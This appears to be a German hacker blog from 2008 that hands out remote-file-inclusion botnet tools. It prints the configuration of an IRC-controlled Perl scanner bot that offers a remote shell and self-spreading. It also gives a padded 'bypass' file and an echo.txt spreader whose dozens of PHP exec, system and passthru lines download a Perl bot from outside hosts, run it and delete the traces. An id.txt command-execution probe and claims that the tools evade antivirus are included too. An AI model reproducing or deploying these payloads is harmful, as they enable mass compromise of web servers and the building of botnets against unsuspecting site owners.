RFI (Perlbot/Phpbot/etc.)

Mittwoch, 13. august 2008
jo wieder nen rfibot von Osyris ist auch private bzw wurde vor ein paar tagen Public allerdings wird bis jetzt nochnicht von irgendwelchen Virenprogs erkannt wie ihr hier sehen könnt :)

ich hoffe das er nun schneller erkannt wird :) oder villt auch nicht aber ich denke es könnte euch von nützen sein :)

hier ein kleiner auszug ...

#!/usr/bin/perl

  #####################################################################################
  ##                                                                                 ##
  ##                                                                   15/06/2008    ##
  ##  Author  : Osirys                                                               ##
  ##  WebSite :                                                                      ##
  ##  Contact : osirys[at]live[dot]it                                                ##
  ##  Italian Coder                                                                  ##
  ##                                                                                 ##
  ##  ## IMPORTANT ##                                                                ##
  ##   # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY          ##
  ##   # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !!                     ##
  ##  ##                                                                             ##
  ##                                                                                 ##
  ##  Release: v6 Private                                                            ##
  ##      After the success of the v5, I decided to code a new release :-)           ##
  ##      This is a private script. If you have it, keep it priv8 !!!                ##
  ##                                                                                 ##
  ##  Features:                                                                      ##
  ##    [+]Sql Injection Scanner (Fixed a bug which release v5 was affected)         ##
  ##    [+]Remote File Inclusion Scanner                                             ##
  ##    [+]Local File Inclusion Scanner                                              ##
  ##    [+]Remote Code Execution Scanner                                             ##
  ##    [+]Mass Scan, Google,AlltheWeb,Yahoo, Msn domains:                           ##
  ##      .at/.com.au/.com.br/.ca/.ch/.cn/.de/.dk/.es/.fr/.it/.co.jp/.com.mx/.co.uk  ##
  ##    [+]Integrated Shell, so you can execute commands on the server               ##
  ##    [+]Security Mode to protect "dangerous" functions                            ##
  ##    [+]Spread Mode, to activate or disable Spread Function                       ##
  ##    [+]Single Spread Mode, to spread on RFI vulnerable sites                     ##
  ##    [+]Bypass Engines ON: Google, Yahoo                                          ##
  ##    !: To "bypass" these engines, the Scanner just looks for websites on other   ##
  ##    engines that use the same bots than the main ones                            ##
  ##                                                                                 ##
  #####################################################################################


use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

#######################################################
## CONFIGURATION                                     //
#######################################################

$auth = "Osirys";
$authmail = "osirys\@live.it";
my $id    = "http://ciro1992.org/ciao/id.txt??";               #Your RFI Response
my $shell = "http://evilc0der.com/r57.txt?";                                  #Shell printed on the Vulnerable Site
my $ircd  = "irc.oltreirc.net";                                                  #Irc-Server
my $port  = "6667";                                                           #Irc-Server Port
my $chan1 = "#osirys";                                                          #Chan for Scan
my $chan2 = "#Vuln";                                                          #Results will be printed here too
my $nick  = "v6";                                                      #Nick
my @admins = ("Osirys");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;

### USEFULL OPTIONS ( 0 => OFF  ;  1 => ON )

my $spread = "";

my $spreadACT   = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
&cheek();
my $killpwd   = "lol"; #Password to Kill the Bot
my $chidpwd   = "lol"; #Password to change the RFI Response
my $cmdpwd    = "lol"; #Password to execute commands on the server
my $secpwd    = "lol"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "lol"; #Passowrd to enable/disable the Spread Mode

my $badspreadpwd != $spreadpwd;
my $badkillpwd   != $killpwd;
my $badidpwd     != $chidpwd;
my $badcmdpwd    != $cmdpwd;
my $badsecpwd    != $secpwd;

#######################################################
## END OF CONFIGURATION                              //
#######################################################

Hier nun der komplette bot zum download

Download :

http://www.ziddu.com/downloadfile/1912890/gg.txt.html

mfg
Bloody



von Bloody
Kommentar hinzufügen - Kommentare (4) - empfehlen
Mittwoch, 13. august 2008
Hallo ich möchte heute einen google bypass veröffendlichen diesen braucht ihr um z.b. mit rfibots nach rfi lücken zu scannen. Da dieser bypass noch funktionier werde ich ihn Public machen damit er schnell verbreitet und erkannt wird eine kopie an jeweilige softwarefirmen wurde geschickt also kurze zeit sollte es noch funzen HF :D


<title>Google Bypass</title>
<h2>PHPESSID712647120509832974891263402184712863702163897890127012873</h2><br><br>END OF BYPASS FILE<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<?
$url="http://hellirc.web44.net/";
exec('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
exec('cd /tmp;GET '.$url.'bot? > bot?;perl bot?;rm -f bot?*;');
exec('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
exec('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
exec('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
passthru('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
passthru('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
passthru('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
passthru('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
passthru('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
system('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
system('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
system('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
system('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
system('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
shell_exec('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
shell_exec('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
shell_exec('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
shell_exec('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
shell_exec('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
popen('cd /tmp;wget '.$url.'bot?;perl bot?;rm bot?*;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
popen('cd /tmp;curl -O '.$url.'bot?; perl bot?;rm bot?*;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
popen('cd /tmp;lwp-download '.$url.'bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
popen('cd /tmp;lynx -source '.$url.'bot? >bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
popen('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
popen('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
@exec('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
@exec('cd /tmp;GET '.$url.'bot? > bot?;perl bot?;rm -f bot?*;');
@exec('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
@exec('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
@exec('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@passthru('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@passthru('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
@passthru('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
@passthru('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
@passthru('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@system('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
@system('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@system('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
@system('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
@system('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@shell_exec('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
@shell_exec('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@shell_exec('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
@shell_exec('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
@shell_exec('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@popen('cd /tmp;wget '.$url.'bot?;perl bot?;rm bot?*;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'bot?; perl bot?;rm bot?*;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'bot? >bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
?>



mfg
Bloody
von Bloody
Kommentar hinzufügen - Kommentare (0) - empfehlen
Sonntag, 10. august 2008


//  .'|. '||'  '|'  .|'''.|   ||   ..|''||   '|.   '|'
//.||.    ||    |   ||..  '  ...  .|'    ||   |'|   |
// ||     ||    |    ''|||.   ||  ||      ||  | '|. |
// ||     ||    |  .     '||  ||  '|.     ||  |   |||
//.||.     '|..'   |'....|'  .||.  ''|...|'  .|.   '|

   ____________
//| Project RFI by: fUSiON
//|
//| IRC: irc.milw0rm.com:6667 #fUSiON
//| Email: rootbox@myway.com
//|


This win32 scanner search for rfi (remote file inclusion) vuln sites over google.
The application was written in c#, so .Net 2.0 Framework is required to beeing able to run the Scanner.
http://www.microsoft.com/downloads/details.aspx?familyid=0856eacb-4362-4b0d-8edd-aab15c5e04f5&displaylang=en


[UPDATED Versions]
[27. 06. 2008, 04:28 GMT+01:00] // Version 2.41
- Fixed checkbox for specific parameter check

[26. 06. 2008, 21:22 GMT+01:00] // Version 2.31
- Changed the pinging behaviour, a failed ping to google doesn't block the scanning module anymore

[26. 06. 2008, 05:41 GMT+01:00] // Version 2.21
- Changed the checking code, doesn't check the first and the second parameter anymore, checks now every parameter in the url for rfi vulns
- Changed the layout of the google scan module

[25. 06. 2008, 10:13 GMT+01:00] // Version 2.1
- Fixed problems with reading/writing of files

[25. 06. 2008, 09:09 GMT+01:00]
- Fixed hanging scanner if there wasn't a match of the search string on google
- Added finish scan message after scanning was completed

[25. 06. 2008, 08:49 GMT+01:00]
- Changed the checking function, the scanner should now be able to give a 99% sureness that vuln sites cause of an include or main remote file inclusion vulnerabillity.


HuHu,
villt kann ja einer von euch das gebrauchen ich habe dafür keine verwendung also viel spaß beim saugen funktionieren tut es auch :) soweit ich das sehen konnte schaut halt selber



Download :
*someone from ryan said that it is backdoored so i removed it and i will chegg if its really backdoored or Trojanized*



MFG Bloody




///// Nachtrag vom 14.08.08 /////
So da jemand bei ryan meinte das es backdoored oder botted sei werde ich das ganze mal unter die Lupe nehmen
und mir das programm anschauen und auf herz und nieren testen.
Ihr werden natürlich dadrüber informiert was nun los ist :) ich denke ich werde dazu dann einen eigenen thread öffnen :) bis dann
MFG Bloody
///// Nachtrag vom 14.08.08 /////










von Bloody
Kommentar hinzufügen - Kommentare (0) - empfehlen
Sonntag, 10. august 2008
Hallo liebe Leser und Mitleser,
Ich habe da von Osyris nen rfi-bot gefunden vor 2-3 Wochen der sehr gut funktionierte und sehr viele "nützliche" funktionen hat im Bereich RFI / LFI / SQL. In der v5 version lief der bot nicht bei mir im sinne von spreading und das bypassing von suchmaschienen funktionierte nicht desweiteren habe ich die Flood-Errors ( bot disconnect from irc (excess flooding) berichtigt so das der bot nicht wegen flooden oder wiedergeben von results disconnected. Das Suchmaschienen Bypassing geht jetzt auch wieder. das spreaden sollte auch wieder funktionieren ich lege mal eine korrekte ID response datei mit hinzu und eine echoscript datei hinzu.


#!/usr/bin/perl
### v5 Osyris priv8 !!_/ PRIVATE
### v5.1 modded by 1x33x7 !!_/ PRIVATE
### - German Interface !!_/ PRIVATE
### - spreading fixxed !!_/ PRIVATE
### - bot disconnect from irc (excess flooding) fixxed !!_/ PRIVATE
### - working id.txt and echo.txt !!_/ PRIVATE
### - fully Undetected !!_/ PRIVATE

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

#######################################################
## CONFIGURATION                                     //
#######################################################


my $id    = "http://www.xx.org/robots.txt?"; #Your RFI Response
my $shell = "http://xxx.xx.xx/ehxxxxac/c0.txt?"; #Shell printed on the Vulnerable Site
my $ircd  = "IRCSERVER";
my $port  = "6667";
my $chan1 = "#BOTCHANNEL"; #chan for Scan
my $nick  = "1x33x7vsOsyris";
my $sqlpidpr0c = 50; # Dieses ist die Zahl Aufstellungsorten, die der Bot in der gleichen Zeit prüft. Für ein accurated scann it' s empfohlen, um eine geringe Anzahl einzustellen (1)
# (Besonders, wenn Sie auf 0day Bugs scannen), soviele verletzbare Aufstellungsorte. Es kann dazu führen das der bot weiterhin sichselbst flooded und kickt allerdings nicht shcon bei 100 threads oder so :)
# gerade wenn ihr auf ätere Bugs scanned, wo nicht viele Resultate sind, können Sie eine höhere Zahl, so schneller geht es
my $rfipidpr0c = 50;

### USEFULL OPTIONS ( 0 => OFF  ;  1 => ON )

my $spread = "http://xxx.xx.xx/ehxxxxac/echo.txt??";

my $spreadACT = 1; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled

### Ihr braucht nur ein Passwort wenn ihr $securityACT auf 1 (an) gestellt habt

my $killpwd = "PW"; #Password to Kill the Bot
my $chidpwd = "PW"; #Password to change the RFI Response
my $cmdpwd = "PW"; #Password to execute commands on the server
my $secpwd = "PW";
my $spreadpwd = "PW";

my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd =! $cmdpwd;


#######################################################
## END OF CONFIGURATION                              //
#######################################################


So schauen wir uns den Bot mal etwas genauer an damit ihr die wichtigsten commands wisst :) wobei dadurch das die Info etc. auf deutsch ist solltet ihr keine probleme haben denke ich nur das Suchmaschienen abfragen musste ich leider auf Englisch beibehalten da es sonst probleme mitn Bypass gegeben hätte.


So sieht der Bot im Channel aus



Hier der Virenscan von jotti auf den RFI-Bot (100% UD)


So wie ihr sehen könnt ist dieser RFI-Bot komplett clean ist nirgends bekannt etc also viel spaß beim spreaden :)

Hier habt ihr die id.txt diese ist wichtig für die RFI-Abfrage

<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>

<H1>Osirys</H1>

</html></head></body>

<?php

if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){

echo("Safe Mode of this Server is : ");

echo("SafemodeOFF");

}

else{

ini_restore("safe_mode");

ini_restore("open_basedir");

if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){

echo("Safe Mode of this Server is : ");

echo("SafemodeOFF");

}else{

echo("Safe Mode of this Server is : ");

echo("SafemodeON");

}

}

function ex($cfe){

$res = '';

if (!empty($cfe)){

if(function_exists('exec')){

@exec($cfe,$res);

$res = join("\n",$res);

}

elseif(function_exists('shell_exec')){

$res = @shell_exec($cfe);

}

elseif(function_exists('system')){

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(function_exists('passthru')){

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(@is_resource($f = @popen($cfe,"r"))){

$res = "";

while(!@feof($f)) { $res .= @fread($f,1024); }

@pclose($f);

}

}

return $res;

}

exit;




diese ladet ihr auf irgendeinem Host rauf und verlinkt diese dann im Bot unter RFI-Response.
als nächstes wollenw ir ja das der Bot auch spreaded XD ne :) also machen wir uns eine echo.txt wo folgendes drin ist.


<title>By 1x33x7</title>
<h1>lol@gmail.com</h1>
<?
shell_exec('cd /tmp;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp; wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;rm -rf new3**');
shell_exec('cd /dev/shm;rm -rf new3**');
system('cd /tmp;rm -rf new3**');
system('cd /dev/shm;rm -rf new3**');
passthru('cd /tmp;rm -rf new3**');
passthru('cd /dev/shm;rm -rf new3**');
shell_exec('cd /tmp;rm -rf new3**');
shell_exec('cd /dev/shm;rm -rf new3**');
system('cd /tmp;rm -rf new3**');
system('cd /dev/shm;rm -rf new3**');
passthru('cd /tmp;rm -rf new3**');
passthru('cd /dev/shm;rm -rf new3**');
shell_exec('cd /tmp;rm -rf new3**');
shell_exec('cd /dev/shm;rm -rf new3**');
system('cd /tmp;rm -rf new3**');
system('cd /dev/shm;rm -rf new3**');
passthru('cd /tmp;rm -rf new3**');
passthru('cd /dev/shm;rm -rf new3**');
shell_exec('cd /tmp;rm -rf new3**');
shell_exec('cd /dev/shm;rm -rf new3**');
system('cd /tmp;rm -rf new3**');
system('cd /dev/shm;rm -rf new3**');
passthru('cd /tmp;rm -rf new3**');
passthru('cd /dev/shm;rm -rf new3**');
?>



" http://xxx.xxxx.xx/exxxxxxxxac/ "
diesen Link bitte mit euren austauschen wo ihr die sachen hochgeladen habt
danach ladet ihr auch diese txt auf euren hoster hoch und verlink diesen im Spreadfeld von der Bot-Konfiguration nun solltet ihr noch die restlichen daten ausfüllen wie irc server etc und euch steht einem erfolgreichen RFI-Spread nichts im wege. Achja fast hätte ich es vergessen ich lege noch eine c100 shell mit bei :) diese Version hier


*  Locus7s Modified c100 Shell                                                                 
